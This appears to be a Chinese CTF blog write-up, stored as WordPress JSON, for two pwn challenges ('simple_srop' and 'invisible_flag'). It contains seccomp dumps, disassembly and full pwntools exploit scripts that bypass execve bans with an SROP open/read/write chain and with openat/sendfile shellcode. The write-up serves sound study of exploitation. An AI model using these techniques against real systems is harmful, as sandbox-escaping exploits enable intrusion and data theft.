{"id":580,"date":"2025-07-31T12:58:10","date_gmt":"2025-07-31T04:58:10","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=580"},"modified":"2025-07-31T12:58:10","modified_gmt":"2025-07-31T04:58:10","slug":"haking","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=580","title":{"rendered":"haking"},"content":{"rendered":"\n

simple_srop<\/h3>\n\n\n\n

\u5148\u627esigreturn<\/p>\n\n\n\n

.text:000000000040128E                 public rt_sigreturn
.text:000000000040128E rt_sigreturn    proc near
.text:000000000040128E ; __unwind {
.text:000000000040128E                 endbr64
.text:0000000000401292                 push    rbp
.text:0000000000401293                 mov     rbp, rsp
.text:0000000000401296                 mov     rax, 0Fh
.text:000000000040129D                 syscall                 ; LINUX - sys_rt_sigreturn
.text:000000000040129F                 retn
.text:000000000040129F rt_sigreturn    endp ; sp-analysis failed<\/code><\/pre>\n\n\n\n
.text:0000000000401296<\/code>\u4f5c\u4e3asigreturn<\/p>\n\n\n\n
000000000040129D<\/code> \u5c31\u662fsyscall<\/p>\n\n\n\n
\u518d\u8bb0\u5f55\u4e00\u4e0bmain\u51fd\u6570\u7684\u5730\u5740 \uff1a 0x4012A3<\/code><\/p>\n\n\n\n
\u7136\u540e\u5c31\u662f\u8003\u8651\u56e0\u4e3a\u6c99\u7bb1\u9650\u5236\u4e0b\u60f3\u529e\u6cd5\u53bb\u83b7\u53d6flag\u7684\u95ee\u9898<\/p>\n\n\n\n
\u5148\u67e5\u4fdd\u62a4<\/p>\n\n\n\n
\u2514\u2500$ seccomp-tools dump .\/vuln
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008
 0005: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0008
 0006: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x06 0x00 0x00 0x00000000  return KILL
\u200b<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u7684\u60c5\u51b5\u5c31\u662fban\u6389\u4e86execve<\/p>\n\n\n\n
\u5c31\u662f\u53ea\u80fd\u6309o rw\u5f00<\/p>\n\n\n\n
\u4f46\u662f\u5e38\u89c4o rw\u6253\u5e94\u8be5\u662f\u6253\u4e0d\u7a7f\u7684<\/p>\n\n\n\n
\u5bc4\u5b58\u5668\u7684\u503c\u90fd\u4e0d\u597d\u8bbe\u5b9a<\/p>\n\n\n\n
\u6240\u4ee5srop+o rw\u7684\u601d\u8def\u5c31\u5f88\u660e\u786e\u4e86<\/p>\n\n\n\n
\u8003\u8651\u5230\u8981\u6784\u9020\u633a\u957f\u4e00\u6bb5\u865a\u5047\u7684\u6808\u5e27\uff0c\u6240\u4ee5\u53bb\u627e\u7a0b\u5e8f\u6700\u672b\u5c3e\u6808\u5730\u5740\u7136\u540e\u770b\u7740\u968f\u4fbf\u5f80\u540e\u4e00\u70b9\u5199\u5c31\u597d\u4e86<\/p>\n\n\n\n
extern:00000000004040C8 end _start<\/code><\/p>\n\n\n\n
\u6240\u4ee5\u8bbe\u5b9aFAKE_STACK_BASE = 0x404100<\/p>\n\n\n\n
\ud83d\udccd\u5730\u5740             | \u5185\u5bb9                          | \u8bf4\u660e
------------------|-------------------------------|-------------------------
0x404100          | 0x0000000000401296            | SIGRETURN_ADDR \u2192 open
0x404108          | SigreturnFrame(open)          | SYS_open, rdi = &\"flag\"
...               | \uff08frame \u5360\u7ea6 248 \u5b57\u8282\uff09        | rsp = 0x404200
\u200b
0x404200          | 0x0000000000401296            | SIGRETURN_ADDR \u2192 read
0x404208          | SigreturnFrame(read)          | SYS_read, rdi = 3
...               | \uff08frame \u5360\u7ea6 248 \u5b57\u8282\uff09        | rsp = 0x404300
\u200b
0x404300          | 0x0000000000401296            | SIGRETURN_ADDR \u2192 write
0x404308          | SigreturnFrame(write)         | SYS_write, rdi = 1
...               |                                | rsp = 0x404400
\u200b
0x404400          | 0x00000000004012A3            | MAIN_ADDR\uff08\u8df3\u56de\u4e3b\u51fd\u6570\uff09
\u200b
\ud83d\udd340x404408 = FAKE_STACK_BASE + 0x308
                  | b\"flag\\x00\"                   | \u6587\u4ef6\u540d\uff0c\u63d0\u4f9b\u7ed9 open
\u200b<\/code><\/pre>\n\n\n\n
\u6bcf\u4e2a SigreturnFrame \u662f 0xf8 \u5b57\u8282\uff08248 \u5b57\u8282\uff09\uff0c\u56e0\u6b64\u6bcf\u4e00\u5e27\u7528 +0x100<\/code> \u95f4\u9694\u53ef\u4ee5\u907f\u514d\u5e27\u4e4b\u95f4\u91cd\u53e0<\/p>\n\n\n\n
MAIN_ADDR<\/code> \u88ab\u653e\u5728 0x404400<\/code>\uff0c\u7d27\u63a5\u5728\u7b2c\u4e09\u4e2a frame \u4e4b\u540e<\/p>\n\n\n\n
FILENAME_OFFSET = 0x308<\/pre>\n\n\n\n
\u8fd9\u4e2a\u7684\u539f\u7406\u4e5f\u76f4\u63a5\u770b\u4e0a\u9762\u7ed9\u51fa\u7684\u8868\u56fe\u5c31\u597d\uff0c\u4e3a\u4e86\u907f\u514d\u7834\u574f\u524d\u9762\u8bbe\u5b9a\u7684SROP\u6808\u5e27\u6240\u4ee5\u5c31\u5f80\u540e\u4e00\u70b9\u5199\uff0c\u51990x308\u662f\u521a\u521a\u597d\uff0c\u518d\u5f80\u524d\u8d70\u4e00\u70b9\u5c31\u51fa\u4e0d\u4e86flag\u5185\u5bb9\u4e86\uff0c\u5c31\u7b97\u6253\u7a7f\u4e86\u4e5f\u53ea\u4f1a\u8f93\u51faflag\u5b57\u6837<\/p>\n\n\n\n
\u96be\u70b9\u5c31\u662f\u770b\u6808\u5e27\u903b\u8f91\u53bb\u8bbe\u5b9asrop+o rw\u7684\u8fd9\u4e2a\u94fe\u5b50<\/p>\n\n\n\n
exp\uff1a<\/p>\n\n\n\n
from pwn import *\n\n\ncontext.arch = 'amd64'\ncontext.log_level = 'info'\n\n\nSYS_READ = constants.SYS_read\nSYS_OPEN = constants.SYS_open\nSYS_WRITE = constants.SYS_write\n\n\nSIGRETURN_ADDR = 0x401296\nSYSCALL_RET_ADDR = 0x40129D\nMAIN_ADDR = 0x4012A3\nFAKE_STACK_BASE = 0x404100\nFILENAME_OFFSET = 0x308  # \u6587\u4ef6\u540d\u5b58\u50a8\u504f\u79fb\u91cf\n\n\n\ndef init_connection():\n    # return process('.\/vuln')\n    return remote('gz.imxbt.cn', 20242)\n\n\nconn = init_connection()\n\n\n# ======================\n# \u7b2c\u4e00\u9636\u6bb5\uff1a\u8bbe\u7f6eSROP\u8bfb\u53d6\u7b2c\u4e8c\u9636\u6bb5payload\n# ======================\ndef build_stage1_payload():\n    # \u521b\u5efaSROP\u5e27\n    frame = SigreturnFrame()\n    frame.rax = SYS_READ  # \u7cfb\u7edf\u8c03\u7528\u53f7\uff1aread\n    frame.rdi = 0  # \u6587\u4ef6\u63cf\u8ff0\u7b26\uff1astdin\n    frame.rsi = FAKE_STACK_BASE  # \u8bfb\u53d6\u76ee\u6807\u5730\u5740\n    frame.rdx = 0x500  # \u8bfb\u53d6\u957f\u5ea6\n    frame.rsp = FAKE_STACK_BASE  # \u6808\u6307\u9488\u91cd\u7f6e\u5230\u76ee\u6807\u5730\u5740\n    frame.rip = SYSCALL_RET_ADDR\n\n    # \u6784\u9020payload\n    payload = b'A' * 0x20  # \u586b\u5145\u7f13\u51b2\u533a\n    payload += p64(0)  # \u5bf9\u9f50\u503c\n    payload += p64(SIGRETURN_ADDR)  # \u89e6\u53d1SROP\n    payload += bytes(frame)  # SROP\u5e27\n\n    return payload\n\n\n# \u53d1\u9001\u7b2c\u4e00\u9636\u6bb5payload\nconn.send(build_stage1_payload())\n\n\n# ======================\n# \u7b2c\u4e8c\u9636\u6bb5\uff1a\u6587\u4ef6\u64cd\u4f5c\u94fe\n# ======================\ndef build_stage2_payload():\n    payload = b''\n\n\n    payload += p64(SIGRETURN_ADDR)\n\n    open_frame = SigreturnFrame()\n    open_frame.rax = SYS_OPEN\n    open_frame.rdi = FAKE_STACK_BASE + FILENAME_OFFSET  # \u6587\u4ef6\u540d\u5730\u5740\n    open_frame.rsi = 0  # \u53ea\u8bfb\u6a21\u5f0f\n    open_frame.rsp = FAKE_STACK_BASE + 0x100  # \u8bbe\u7f6e\u65b0\u6808\u4f4d\u7f6e\n    open_frame.rip = SYSCALL_RET_ADDR\n    payload += bytes(open_frame)\n\n\n    payload += p64(SIGRETURN_ADDR)\n\n    read_frame = SigreturnFrame()\n    read_frame.rax = SYS_READ\n    read_frame.rdi = 3  # \u6587\u4ef6\u63cf\u8ff0\u7b26\n    read_frame.rsi = FAKE_STACK_BASE + FILENAME_OFFSET  # \u5b58\u50a8\u4f4d\u7f6e\n    read_frame.rdx = 0x100  # \u8bfb\u53d6\u957f\u5ea6\n    read_frame.rsp = FAKE_STACK_BASE + 0x200  # \u8bbe\u7f6e\u65b0\u6808\u4f4d\u7f6e\n    read_frame.rip = SYSCALL_RET_ADDR\n    payload += bytes(read_frame)\n\n\n    payload += p64(SIGRETURN_ADDR)\n\n    write_frame = SigreturnFrame()\n    write_frame.rax = SYS_WRITE\n    write_frame.rdi = 1  # \u6587\u4ef6\u63cf\u8ff0\u7b26\uff1astdout\n    write_frame.rsi = FAKE_STACK_BASE + FILENAME_OFFSET  # \u6570\u636e\u5730\u5740\n    write_frame.rdx = 0x100  # \u8f93\u51fa\u957f\u5ea6\n    write_frame.rsp = FAKE_STACK_BASE + 0x300  # \u8bbe\u7f6e\u65b0\u6808\u4f4d\u7f6e\n    write_frame.rip = SYSCALL_RET_ADDR\n    payload += bytes(write_frame)\n\n\n    payload += p64(MAIN_ADDR)\n\n\n    # \u586b\u5145\u5230\u6587\u4ef6\u540d\u4f4d\u7f6e\n    payload = payload.ljust(FILENAME_OFFSET, b'\\x00')\n    payload += b'flag\\x00'  # \u6587\u4ef6\u540d\n\n    return payload\n\n\n# \u53d1\u9001\u7b2c\u4e8c\u9636\u6bb5payload\nconn.send(build_stage2_payload())\n\n\nconn.interactive()<\/code><\/pre>\n\n\n\n
invisible_flag<\/h3>\n\n\n\n
\u770b\u5230\u6709\u6c99\u7bb1<\/p>\n\n\n\n
\u67e5\u4fdd\u62a4<\/p>\n\n\n\n
\u2514\u2500$ seccomp-tools dump .\/vuln
show your magic again
da
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x07 0x00 0x00000000  if (A == read) goto 0013
 0006: 0x15 0x06 0x00 0x00000001  if (A == write) goto 0013
 0007: 0x15 0x05 0x00 0x00000002  if (A == open) goto 0013
 0008: 0x15 0x04 0x00 0x00000013  if (A == readv) goto 0013
 0009: 0x15 0x03 0x00 0x00000014  if (A == writev) goto 0013
 0010: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0013
 0011: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL<\/code><\/pre>\n\n\n\n
\u5e38\u89c4\u7684\u73a9o rw\u7684\u65b9\u6cd5\u90fdban\u6389\u4e86<\/p>\n\n\n\n
\u4f46\u662f\u53c8\u51fa\u73b0\u4e86\u4e00\u4e9b\u65b0\u7684\u597d\u7528\u7684\u529e\u6cd5\u6765\u505a<\/p>\n\n\n\n
\u56e0\u4e3aopenat\u6ca1\u88abban\u6389<\/p>\n\n\n\n
\u6240\u4ee5\u5c31\u53ef\u4ee5\u7528\u5176\u5145\u5f53open\u529f\u80fd<\/p>\n\n\n\n
rw\u5219\u53ef\u4ee5\u4f9d\u9760sendfile\u6765\u66ff\u4ee3<\/p>\n\n\n\n
\u5148\u7ed9\u51faexp\uff1a<\/p>\n\n\n\n
from pwn import *
\u200b
filename = '.\/vuln'
context.arch='amd64'
context.log_level = 'debug'
\u200b
sh = remote(\"gz.imxbt.cn\",20245)
\u200b
shellcode = asm(shellcraft.openat(0,'\/flag',0))
shellcode += asm(shellcraft.sendfile(1,3,0,0x50))
\u200b
sh.sendline(shellcode)
\u200b
sh.interactive()<\/code><\/pre>\n\n\n\n
    \n
  • sendfile<\/code><\/strong>\uff1a\u76f4\u63a5\u5728\u4e24\u4e2a\u6587\u4ef6\u63cf\u8ff0\u7b26\u4e4b\u95f4\u4f20\u8f93\u6570\u636e\uff08\u5185\u6838\u4e2d\u64cd\u4f5c\uff0c\u65e0\u9700\u7528\u6237\u7a7a\u95f4\u7f13\u51b2\uff09\n
      \n
    • \u53c2\u6570 1<\/code>\uff1a\u76ee\u6807 fd\uff08stdout\uff0c\u76f4\u63a5\u8f93\u51fa\u5230\u7ec8\u7aef\uff09<\/li>\n\n\n\n
    • \u53c2\u6570 3<\/code>\uff1a\u6e90 fd\uff08\u4e0a\u4e00\u6b65\u6253\u5f00\u7684 \/flag<\/code>\uff09<\/li>\n\n\n\n
    • \u53c2\u6570 0<\/code>\uff1a\u4ece\u6587\u4ef6\u504f\u79fb\u91cf 0 \u5f00\u59cb\u8bfb\u53d6<\/li>\n\n\n\n
    • \u53c2\u6570 0x50<\/code>\uff1a\u8bfb\u53d6\u957f\u5ea6\uff0880 \u5b57\u8282\uff0c\u8db3\u591f\u8986\u76d6 flag\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
        \n
      • sendfile<\/code> \u76f4\u63a5\u4ece\u6e90 fd \u8bfb\u53d6\u6570\u636e\u5e76\u5199\u5165\u76ee\u6807 fd\uff0c\u76f8\u5f53\u4e8e read<\/code> + write<\/code> \u7684\u7ec4\u5408\u3002<\/li>\n\n\n\n
      • \u6574\u4e2a\u8fc7\u7a0b\u5728\u5185\u6838\u4e2d\u5b8c\u6210\uff0c\u65e0\u9700\u7528\u6237\u7a7a\u95f4\u53c2\u4e0e\uff0c\u907f\u514d\u4e86\u663e\u5f0f\u8c03\u7528 read<\/code>\/write<\/code>\u3002\u3001<\/li>\n<\/ul>\n\n\n\n
        \u518d\u8bf4\u4e3a\u4ec0\u4e48\u8fd9\u6837\u6253\uff0c\u8fdbmain\u51fd\u6570\u4e00\u770b\uff0c\u5148\u7ed9\u4e86\u4e00\u6bb57\u6743\u9650\u7684\u6808\u7a7a\u95f4<\/p>\n\n\n\n
        int __fastcall main(int argc, const char **argv, const char **envp)
        {
          void *addr; \/\/ [rsp+8h] [rbp-118h]
        \u200b
          init();
          addr = mmap((void *)0x114514000LL, 0x1000uLL, 7, 34, -1, 0LL);
          if ( addr == (void *)-1LL )
          {
            puts(\"ERROR\");
            return 1;
          }
          else
          {
            puts(\"show your magic again\");
            read(0, addr, 0x200uLL);
            sandbox();
            ((void (*)(void))addr)();
            return 0;
          }
        }<\/code><\/pre>\n\n\n\n
        \u6240\u4ee5\u5199\u4e0a\u53bb\u5c31\u80fd\u6267\u884c\u6211\u4eec\u7684shellcode\u5185\u5bb9<\/p>\n\n\n\n
        \u6240\u4ee5\u5c31\u80fd\u76f4\u63a5\u62ff\u5230flag<\/p>\n","protected":false},"excerpt":{"rendered":"
        simple_srop \u5148\u627esigreturn .text:0000000000401296\u4f5c\u4e3asigretu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-580","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=580"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/580\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}